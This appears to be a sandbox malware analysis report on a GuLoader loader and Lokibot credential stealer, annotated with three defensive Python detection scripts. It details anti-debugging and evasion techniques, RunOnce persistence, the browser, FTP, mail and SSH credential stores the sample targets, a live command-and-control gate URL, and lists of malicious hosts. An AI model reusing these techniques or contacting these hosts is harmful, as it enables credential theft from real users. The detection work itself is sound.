Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer (2 occurrences)
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Trkvogn\TELETE.exe TID: 4356 | Thread sleep time: -120000s >= -30000s
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: wscript.exe, 00000005.00000002.815611340.0000011E358D0000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.838431357.0000023606D80000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000005.00000002.815611340.0000011E358D0000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.838431357.0000023606D80000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000005.00000002.815611340.0000011E358D0000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.838431357.0000023606D80000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000005.00000002.815611340.0000011E358D0000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.838431357.0000023606D80000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
All four strings were found in the memory of wscript.exe, a Windows binary, not in the sample's own code, and they are stock Hyper-V error messages; on their own they are weak evidence that the sample checks for a virtual machine. The sleep and the WSH timer are the stronger evasion indicators in this section.

Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D022B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000 (information class 0x11 is ThreadHideFromDebugger; a thread marked this way no longer delivers debug events)
Hides threads from debuggers
Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Thread information set: HideFromDebugger (2 occurrences)
Source: C:\Users\user\Trkvogn\TELETE.exe | Thread information set: HideFromDebugger (3 occurrences)
Checks if the current process is being debugged
Source: C:\Users\user\Trkvogn\TELETE.exe | Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Code function: 0_2_021D2C89 LdrInitializeThunk
Contains functionality to read the PEB (32-bit code loading fs:[30h], the PEB pointer held in the TEB)
Source: C:\Users\user\Desktop\RFQ#5647201929.exe (process 0) | Code functions with mov eax, dword ptr fs:[00000030h]: 0_2_021D500D, 0_2_021D2858, 0_2_021D1A6D, 0_2_021D52FD, 0_2_021D114B, 0_2_021D19B8, 0_2_021D4BD7
Source: C:\Users\user\Desktop\RFQ#5647201929.exe (process 2) | Code functions with mov eax, dword ptr fs:[00000030h]: 2_2_004F2858, 2_2_004F1A6D, 2_2_004F500D, 2_2_004F52FD, 2_2_004F114B, 2_2_004F4BD7, 2_2_004F19B8
Source: C:\Users\user\Trkvogn\TELETE.exe (process 3) | Code functions with mov eax, dword ptr fs:[00000030h]: 3_2_021C500D, 3_2_021C2858, 3_2_021C1A6D, 3_2_021C52FD, 3_2_021C114B, 3_2_021C19B8, 3_2_021C4BD7
Source: C:\Users\user\Trkvogn\TELETE.exe (process 4) | Code functions with mov eax, dword ptr fs:[00000030h]: 4_2_004F1A6D, 4_2_004F2858, 4_2_004F500D, 4_2_004F52FD, 4_2_004F114B, 4_2_004F4BD7, 4_2_004F19B8
The same set of low-order function offsets (…500D, …2858, …1A6D, …52FD, …114B, …19B8, …4BD7) recurs in all four processes, only the base address differs, so the dropped TELETE.exe runs the same unpacked stage as the original sample.
Enables debug privileges
Source: C:\Users\user\Trkvogn\TELETE.exe | Process token adjusted: Debug
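
The fs:[30h] loads listed above are the static fingerprint of an inline PEB anti-debug check. The following scanner, added here as an illustration and not part of the Joe Sandbox report or the sample, finds every `mov r32, fs:[0x30]` in a 32-bit code buffer and names the PEB field dereferenced right after it (BeingDebugged at +0x02, NtGlobalFlag at +0x68). The byte string it scans is constructed for the demo, not extracted from RFQ#5647201929.exe or TELETE.exe.

```python
"""Static scan of 32-bit x86 code for PEB reads through the FS segment.

Added example for this report (not Joe Sandbox code). The byte string below is
constructed for the demo, not taken from RFQ#5647201929.exe or TELETE.exe.
"""
import re
from typing import List, NamedTuple, Optional

# In 32-bit Windows code FS points at the TEB and TEB+0x30 holds the PEB pointer,
# so `mov r32, fs:[0x30]` is the usual first step of an inline anti-debug check:
# PEB+0x02 is BeingDebugged, PEB+0x68 is NtGlobalFlag (heap flags set under a debugger).
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x68: "NtGlobalFlag"}

# Encodings of `mov r32, fs:[0x30]`:
#   64 A1 30 00 00 00             short form (eax only)
#   64 8B <modrm> 30 00 00 00     modrm mod=00 rm=101 (disp32), reg field = destination
PEB_READ = re.compile(
    rb"\x64(?:\xA1|\x8B(\x05|\x0D|\x15|\x1D|\x25|\x2D|\x35|\x3D))\x30\x00\x00\x00"
)


class Hit(NamedTuple):
    offset: int            # offset of the fs:[0x30] read in the scanned buffer
    reg: str               # register that receives the PEB pointer
    field: Optional[str]   # PEB field dereferenced shortly afterwards, if any


def _field_read(tail: bytes, base_reg: str) -> Optional[str]:
    """Look for a [base_reg+disp8] access right after the PEB load and name the field."""
    base = REG32.index(base_reg)
    if base == 4:  # [esp+disp8] needs a SIB byte; not a pattern used for PEB reads
        return None
    for i in range(len(tail)):
        if tail[i:i + 2] == b"\x0F\xB6":        # movzx r32, byte ptr [base+disp8]
            j = i + 2
        elif tail[i] in (0x8B, 0x8A, 0x80):     # mov r32/r8, [..]  or  cmp/and/or byte ptr [..], imm8
            j = i + 1
        else:
            continue
        if j + 1 >= len(tail):
            break
        modrm, disp8 = tail[j], tail[j + 1]
        if modrm >> 6 == 1 and modrm & 7 == base:   # mod=01 means [reg+disp8]
            return PEB_FIELDS.get(disp8, f"PEB+0x{disp8:02x}")
    return None


def scan_peb_reads(code: bytes, window: int = 8) -> List[Hit]:
    """Return every fs:[0x30] load in `code`, with the PEB field read within the next `window` bytes."""
    hits = []
    for m in PEB_READ.finditer(code):
        modrm = m.group(1)
        reg = "eax" if modrm is None else REG32[(modrm[0] >> 3) & 7]
        tail = code[m.end():m.end() + window]
        hits.append(Hit(m.start(), reg, _field_read(tail, reg)))
    return hits


# Constructed demo buffer: a BeingDebugged check, filler, then an NtGlobalFlag check via ecx.
SAMPLE_CODE = bytes.fromhex(
    "64A130000000"     # mov   eax, fs:[0x30]
    "0FB64002"         # movzx eax, byte ptr [eax+2]      ; PEB.BeingDebugged
    "85C0"             # test  eax, eax
    "90909090"         # nop x4
    "648B0D30000000"   # mov   ecx, fs:[0x30]
    "8B4168"           # mov   eax, [ecx+0x68]            ; PEB.NtGlobalFlag
    "83E070"           # and   eax, 0x70                  ; FLG_HEAP_* bits a debugger sets
)

if __name__ == "__main__":
    for hit in scan_peb_reads(SAMPLE_CODE):
        print(f"offset 0x{hit.offset:04x}: mov {hit.reg}, fs:[0x30] -> reads {hit.field}")
```

Run it over an unpacked 32-bit stage (for example the .unpack files listed later in this report) to get the same offsets the sandbox reports, plus which field each read feeds; a hit that goes on to read `+0x02` or `+0x68` is an anti-debug check, while a hit followed by `+0x0C` (Ldr) is usually API resolution by walking the loader lists.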

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Process created: C:\Users\user\Desktop\RFQ#5647201929.exe 'C:\Users\user\Desktop\RFQ#5647201929.exe'
Source: C:\Users\user\Desktop\RFQ#5647201929.exe | Process created: C:\Users\user\Trkvogn\TELETE.exe 'C:\Users\user\Trkvogn\TELETE.exe'
Source: C:\Users\user\Trkvogn\TELETE.exe | Process created: C:\Users\user\Trkvogn\TELETE.exe 'C:\Users\user\Trkvogn\TELETE.exe'

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Trkvogn\TELETE.exe | Queries volume information: C:\ VolumeInformation
Queries the cryptographic machine GUID
Source: C:\Users\user\Trkvogn\TELETE.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match | File source: Process Memory Space: TELETE.exe PID: 4944, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Trkvogn\TELETE.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Trkvogn\TELETE.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl (WinSCP's configuration key)
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Trkvogn\TELETE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Trkvogn\TELETE.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\cert9.db
Source: C:\Users\user\Trkvogn\TELETE.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\pkcs11.txt
Source: C:\Users\user\Trkvogn\TELETE.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\key4.db
Source: C:\Users\user\Trkvogn\TELETE.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to harvest and steal ftp login credentials (the targets below are registry keys, although the sandbox labels the access "File opened")
Source: C:\Users\user\Trkvogn\TELETE.exe | Key opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Trkvogn\TELETE.exe | Key opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Trkvogn\TELETE.exe | Key opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Trkvogn\TELETE.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Trkvogn\TELETE.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Remote Access Functionality:

Yara detected Lokibot
Source: Yara match | File source: Process Memory Space: TELETE.exe PID: 4944, type: MEMORY

Malware Configuration

No configs have been found

Behavior Graph

Behavior Graph ID: 218796 | Sample: RFQ#5647201929.exe | Start date: 30/03/2020 | Architecture: WINDOWS | Score: 99

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Potential malicious icon found; Antivirus detection for sample; 3 other signatures

Process tree (started processes, with the signatures, dropped files and network contacts attached to each node):

RFQ#5647201929.exe
    signatures: Creates autostart registry keys with suspicious values (likely registry only malware); Hides threads from debuggers; Contains functionality to hide a thread from the debugger
    RFQ#5647201929.exe (child)
        dropped: C:\Users\user\Trkvogn\TELETE.exe (PE32); C:\Users\user\Trkvogn\TELETE.vbs (ASCII)
        signatures: Hides threads from debuggers
        TELETE.exe
            signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Hides threads from debuggers
            TELETE.exe (child)
                network: 94.176.239.112 (ports 49748, 49749, 49750; ASN unknown, Lithuania); googlehosted.l.googleusercontent.com 216.58.207.65 (ports 443, 49747; ASN unknown, United States); doc-0k-6o-docs.googleusercontent.com
                signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; 2 other signatures
wscript.exe
wscript.exe

Simulations

Behavior and APIs

Time | Type | Description
05:54:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce ORDREMO C:\Users\user\Trkvogn\TELETE.vbs
05:54:33 | API Interceptor | 3x Sleep call for process: TELETE.exe modified
05:54:36 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce ORDREMO C:\Users\user\Trkvogn\TELETE.vbs
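
The two Autostart entries above are the persistence the sandbox replayed: a RunOnce value (ORDREMO) that points at a .vbs under the user profile. The detection below is an added example, not Joe Sandbox code or anything from the sample, that scores registry value-set events in the shape of Sysmon Event ID 13 against that pattern. The first constructed event mirrors the RunOnce write seen here (the SID is made up); the remaining events, the writing images and the other paths are assumptions for the demo.

```python
"""Flag Run/RunOnce autostart values that launch a script from a user-writable path.

Added example for this report (not Joe Sandbox code). The events below are
constructed in the shape of Sysmon Event ID 13 (registry value set); the first
mirrors the RunOnce value the sandbox logged (ORDREMO -> C:\\Users\\user\\Trkvogn\\TELETE.vbs),
the SID, the writing images and the other events are made up.
"""
import re
from typing import Dict, Iterable, List, Optional

# Suffix match so HKCU, HKU\<SID> and HKLM (with or without WOW6432Node) all hit.
RUN_KEY = re.compile(
    r"\\Microsoft\\Windows\\CurrentVersion\\(?P<key>Run(?:Once)?(?:Ex)?)\\(?P<value>[^\\]+)$",
    re.IGNORECASE,
)
SCRIPT_FILE = re.compile(r"\.(?:vbs|vbe|js|jse|wsf|wsh|hta|ps1|bat|cmd)\b", re.IGNORECASE)
SCRIPT_HOST = re.compile(r"\b(?:wscript|cscript|mshta|powershell|pwsh|cmd)(?:\.exe)?\b", re.IGNORECASE)
USER_WRITABLE = re.compile(
    r"(?:[A-Za-z]:\\Users\\|\\AppData\\|%(?:APPDATA|LOCALAPPDATA|TEMP|TMP|USERPROFILE)%)",
    re.IGNORECASE,
)


def assess_autorun(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return an alert dict for a suspicious Run/RunOnce value, or None if it looks ordinary."""
    m = RUN_KEY.search(event["TargetObject"])
    if not m:
        return None
    command = event["Details"].strip()
    reasons = []
    if SCRIPT_FILE.search(command):
        reasons.append("autostart launches a script file")
    if SCRIPT_HOST.search(command):
        reasons.append("autostart invokes a script host")
    in_user_path = bool(USER_WRITABLE.search(command))
    if in_user_path:
        reasons.append("target lives in a user-writable location")
    if not reasons:
        return None
    launches_script = bool(SCRIPT_FILE.search(command) or SCRIPT_HOST.search(command))
    if m.group("key").lower().startswith("runonce"):
        # RunOnce values are deleted after they execute, so the entry is gone by the
        # time a later on-host audit looks at the key; the event log is the record.
        reasons.append("uses RunOnce (self-removing entry)")
    return {
        "image": event["Image"],
        "key": m.group("key"),
        "value": m.group("value"),
        "command": command,
        "severity": "high" if launches_script and in_user_path else "medium",
        "reasons": reasons,
    }


def scan_events(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    return [alert for alert in (assess_autorun(e) for e in events) if alert]


# Constructed events (Sysmon 13 field names: Image, TargetObject, Details).
SAMPLE_EVENTS = [
    {   # what the sandbox observed, as a Sysmon 13 event (SID and image are assumptions)
        "Image": r"C:\Users\user\Desktop\RFQ#5647201929.exe",
        "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\ORDREMO",
        "Details": r"C:\Users\user\Trkvogn\TELETE.vbs",
    },
    {   # benign vendor autostart: binary under %windir%, no script
        "Image": r"C:\Windows\System32\msiexec.exe",
        "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
        "Details": r"%windir%\system32\SecurityHealthSystray.exe",
    },
    {   # script host launching a script from %APPDATA%
        "Image": r"C:\Users\user\AppData\Local\Temp\inv.exe",
        "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
        "Details": r'wscript.exe //B "%APPDATA%\up.js"',
    },
    {   # not an autostart key at all
        "Image": r"C:\Windows\System32\services.exe",
        "TargetObject": r"HKLM\System\CurrentControlSet\Services\Spooler\Start",
        "Details": "DWORD (0x00000002)",
    },
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert["severity"], alert["key"], alert["value"], "->", alert["command"], alert["reasons"])
```

The RunOnce reason matters operationally: by the time an analyst queries HKCU\...\RunOnce on the infected host, the ORDREMO value has already fired and been removed, so the registry-set event is the only durable evidence of the persistence mechanism.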

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
RFQ#5647201929.exe | 11% | Virustotal | (see VirusTotal)
RFQ#5647201929.exe | 100% | Avira | HEUR/AGEN.1046816

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\Trkvogn\TELETE.exe | 100% | Avira | HEUR/AGEN.1046816
C:\Users\user\Trkvogn\TELETE.exe | 11% | Virustotal | (see VirusTotal)

Unpacked PE Files

Source | Detection | Scanner | Label
3.2.TELETE.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1046816
0.0.RFQ#5647201929.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1046816
3.0.TELETE.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1046816
2.0.RFQ#5647201929.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1046816
2.2.RFQ#5647201929.exe.2350000.0.unpack | 100% | Avira | TR/Dropper.Gen
0.2.RFQ#5647201929.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1046816
4.0.TELETE.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1046816

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://pki.goog/gsr2/GTS1O1.crt0 | 0% | Virustotal | (see VirusTotal)
http://pki.goog/gsr2/GTS1O1.crt0 | 0% | URL Reputation | safe
http://crl.pki.goog/gsr2/gsr2.crl0? | 0% | Virustotal | (see VirusTotal)
http://crl.pki.goog/gsr2/gsr2.crl0? | 0% | URL Reputation | safe
http://myurl/myfile.bin | 0% | Avira URL Cloud | safe
http://ocsp.pki.goog/gsr20 | 0% | Virustotal | (see VirusTotal)
http://ocsp.pki.goog/gsr20 | 0% | URL Reputation | safe
https://pki.goog/repository/0 | 0% | Virustotal | (see VirusTotal)
https://pki.goog/repository/0 | 0% | URL Reputation | safe
http://94.176.239.112/panel02/fre.php | 0% | Avira URL Cloud | safe
http://crl.pki.goog/GTS1O1.crl0 | 0% | Virustotal | (see VirusTotal)
http://crl.pki.goog/GTS1O1.crl0 | 0% | URL Reputation | safe
http://ocsp.pki.goog/gts1o10 | 0% | Virustotal | (see VirusTotal)
http://ocsp.pki.goog/gts1o10 | 0% | URL Reputation | safe
The pki.goog entries are Google Trust Services CRL/OCSP/AIA URLs from the TLS certificate chain of the googleusercontent.com download; the only URL here that belongs to the malware is http://94.176.239.112/panel02/fre.php, the panel gate the Lokibot stage contacts, which URL reputation still rated as safe at analysis time.
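
The URL list above, together with the network nodes in the behavior graph, gives the two-step pattern worth detecting on the wire: a payload fetched from googleusercontent.com, followed by POSTs from the same host to a gate script (fre.php) on a bare IP address. The detector below is an added example, not Joe Sandbox code or anything from the sample. The proxy log it parses is constructed: the googleusercontent.com contact and the http://94.176.239.112/panel02/fre.php URL come from this report, while the HTTP methods, timestamps, client addresses, status codes and the remaining entries are assumptions.

```python
"""Correlate a payload fetch from cloud file hosting with a follow-on beacon to an IP-literal C2.

Added example for this report (not Joe Sandbox code). The proxy log lines below
are constructed: the googleusercontent.com contact and the
http://94.176.239.112/panel02/fre.php URL come from the report, while the HTTP
methods, timestamps, client addresses, status codes and other entries are assumptions.
"""
from datetime import datetime, timedelta
from ipaddress import ip_address
from typing import Dict, Iterable, List
from urllib.parse import urlsplit

# Hosting the sample used to stage its payload (report: googlehosted.l.googleusercontent.com, drive.google.com)
STAGING_SUFFIXES = ("googleusercontent.com", "drive.google.com")
# Panel gate file name seen in the report's URL list
GATE_FILES = {"fre.php"}

# Constructed proxy log: "<iso-time> <client-ip> <method> <url> <status>"
SAMPLE_LOG = """\
2020-03-30T05:54:31Z 10.0.0.7 GET https://doc-0k-6o-docs.googleusercontent.com/download 200
2020-03-30T05:54:35Z 10.0.0.7 POST http://94.176.239.112/panel02/fre.php 404
2020-03-30T05:54:36Z 10.0.0.7 POST http://94.176.239.112/panel02/fre.php 404
2020-03-30T05:55:02Z 10.0.0.9 GET https://www.example.org/index.php 200
2020-03-30T06:40:10Z 10.0.0.9 POST http://203.0.113.5/gate/fre.php 200
"""


def parse_log(text: str) -> List[Dict[str, object]]:
    """Parse '<iso-time> <client> <method> <url> <status>' lines into records."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, status = line.split()
        records.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "client": client,
            "method": method.upper(),
            "url": url,
            "status": int(status),
        })
    return records


def is_ip_literal(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def is_staging_host(host: str) -> bool:
    return any(host == s or host.endswith("." + s) for s in STAGING_SUFFIXES)


def detect(records: Iterable[Dict[str, object]],
           window: timedelta = timedelta(minutes=10)) -> List[Dict[str, object]]:
    """Alert on POSTs to a known gate file on an IP-literal host; escalate to high
    when the same client fetched something from a staging host within `window`."""
    last_staging: Dict[str, datetime] = {}
    alerts = []
    for rec in sorted(records, key=lambda r: r["ts"]):
        parts = urlsplit(rec["url"])
        host = (parts.hostname or "").lower()
        if is_staging_host(host):
            last_staging[rec["client"]] = rec["ts"]
            continue
        if rec["method"] == "POST" and is_ip_literal(host) and parts.path.rsplit("/", 1)[-1] in GATE_FILES:
            staged_at = last_staging.get(rec["client"])
            staged = staged_at is not None and rec["ts"] - staged_at <= window
            alerts.append({
                "ts": rec["ts"].isoformat(),
                "client": rec["client"],
                "c2": host,
                "url": rec["url"],
                "severity": "high" if staged else "medium",
                "note": "gate POST shortly after a fetch from cloud file hosting" if staged
                        else "gate POST to IP-literal host",
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_log(SAMPLE_LOG)):
        print(alert)
```

The correlation is what lifts the signal above a plain URL match: a GET from googleusercontent.com is everyday traffic, and a POST to a bare IP is only mildly odd, but the two from one client a few seconds apart is the loader-then-stealer sequence this report shows, and it survives the C2 address changing as long as the gate name and the staging host do not.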

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author
Process Memory Space: TELETE.exe PID: 932 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security
Process Memory Space: RFQ#5647201929.exe PID: 4916 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security
Process Memory Space: TELETE.exe PID: 4944 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security
Process Memory Space: TELETE.exe PID: 4944 | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security
Process Memory Space: RFQ#5647201929.exe PID: 4712 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection
216.58.207.65 | PAYMENT TERMS.lnk | malicious

Domains

Match: googlehosted.l.googleusercontent.com
Associated Sample Name / URL | Detection | Resolved IP
CG2DjQo64E.exe | malicious | 216.58.215.225
Health-Ebook.exe | malicious | 216.58.215.225
Scanned-file452071.pdf.lnk | malicious | 216.58.215.225
nw1.exe | malicious | 172.217.23.97
4wyevtsyFK.exe | malicious | 172.217.23.225
MyHealth.exe | malicious | 172.217.23.225
dadaokr_2335_10000_1531371748511.apk | malicious | 172.217.23.193
http://www.shedemeryville.com/wp-content/uploads/2018/11/badezimmer-verputzen-statt-fliesen-wohndesign-mobel-ideen-von-badezimmer-farbe-statt-fliesen-photo.jpg | malicious | 172.217.23.225
Swift Advice.xlsx | malicious | 172.217.23.225
COVID-19 Emit Plan and Communication _18 March 2020.xlsx | malicious | 172.217.23.193
Chance.exe | malicious | 172.217.23.193
DAWOOENC LNG RFQ PACKAGEDOCUMENTS.exe | malicious | 172.217.23.193
FACTURA PENDIENTE.exe | malicious | 172.217.23.225
request.exe | malicious | 172.217.23.193
https://blacurlik.com/ | malicious | 172.217.23.225
https://apblaw.digitalpigeon.com/msg/pwIPEGhvEeqLHwb4tvG4vQ/IpLh3v_o-TqKu6cKYmjxAA/file/a74077a0-686f-11ea-8b1f-06f8b6f1b8bd | malicious | 172.217.23.193
https://drive.google.com/uc?export=download&id=1QwhJnu-bYB73eWYRaGC_EuhkzqVSA20N | malicious | 172.217.23.225
https://drive.google.com/uc?export=download&id=1BZyO3k5sA4YaOJQDXxp2A3tfsIJBJP_- | malicious | 172.217.23.193
https://www.dropbox.com/s/4yh0zci0kay8ilk/TT%20%20Receipt%20DC.tbz2?dl=1 | malicious | 172.217.23.193
Court-Order-Form-2761810.doc | malicious | 172.217.23.225

ASN

Match: unknown
Associated Sample Name / URL | Detection | IP
https://protection.office.com/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=allemail&query-CanonicalizedUrl=https%3A%2F%2Fu15183222.ct.sendgrid.net%2Fwf%2Fopen%3Fupn%3DV-2FUUiW5KvBPNV-2FItFYsbuBa0SAW-2BdodcPiIb0tKgPse5Msb6NYFlPAJvdCZuYpe1fkThYhSTER8bVjxjayQWF5c7nr-2FLOyjZS808lP9FRXHiFxtYL7EDTUc7Vj4-2Fa-2F9C6sfGDt5-2FjfuGrMmy3ln39oepoTeOqfZT2g1BIoej0Vl3P3jSTNgVVgx7EJfGKirAoZDIFZ9LBsGFPcgQWPkFGjfe7yDNgPGmxlAO98hRgAEK-2FDr4oKMg9KJpAthxA-2BKSjln00vva1c7SBuvY1-2BD1rvm-2BLrPdmriPgXf8b5cz4KBAyhZMMggSHP9gx5m8nXE8Qj-2FSrw1vkdZloBjA1tU1EDt247FbMmpLnmlGBRMCf7EipoJNq3bfuXTrvTTNGV-2BnOW-2BgYs2o2ZSvaBQOoQadwFUYt7mcSsS3yYOA2MHbXfCPpm5UmM9j9ipczmIxpxJWZWzF4tCcj5ETbcSf-2FxPHP3jfn4-2BhYDLXlWKMmCjFo5vZykMfKvtR-2FSwKfdBevPRGicLUPvwNWoJvistlOtQWIALvZl8iZXOlzXMbFkwgYrxpUIScB1rhENzcAg9wsVjLjF32MxpyGPl3s3slMEvU-2Bb6a3ub9g9MH5P5ZJMYawHltDik7udBCOD1-2FPxe-2FVZ0lTIAozBaMyoZpNi6M-2FLkZIzncW0Z8aQw9eAdEXkgJXZI-3D | malicious | 52.109.88.132
https://mpress.ind.br/openview/shared.com.html | malicious | 108.167.188.183
SVClientSetup(3.3.2.17.0.1).exe | malicious | 127.0.0.1
https://www.julioutreras.cl/DOC/DOCUMENT.html | malicious | 190.171.170.94
setup.exe | malicious | 104.18.56.51
2.exe | malicious | 91.208.184.78
WindowsUpdate.exe | malicious | 176.123.3.108
Lab01-01_dll.dll | malicious | 127.26.152.13
BK2hq02nbO.apk | malicious | 199.83.63.130
https://aka.ms/vmsettings | malicious | 152.199.23.37
https://aka.ms/vmsettings | malicious | 152.199.23.37
awesomeapp.apk | malicious | 173.194.76.188
http://107.6.74.93/search?q=1 | malicious | 107.6.74.93
https://gettheleadout.sharepoint.com/:u:/g/EZEYoA48c8xDtwpS_FxxlHEBpNT1BJjtMlCHY_Y_ARNaZw?e=TPpHt4 | malicious | 192.210.238.27
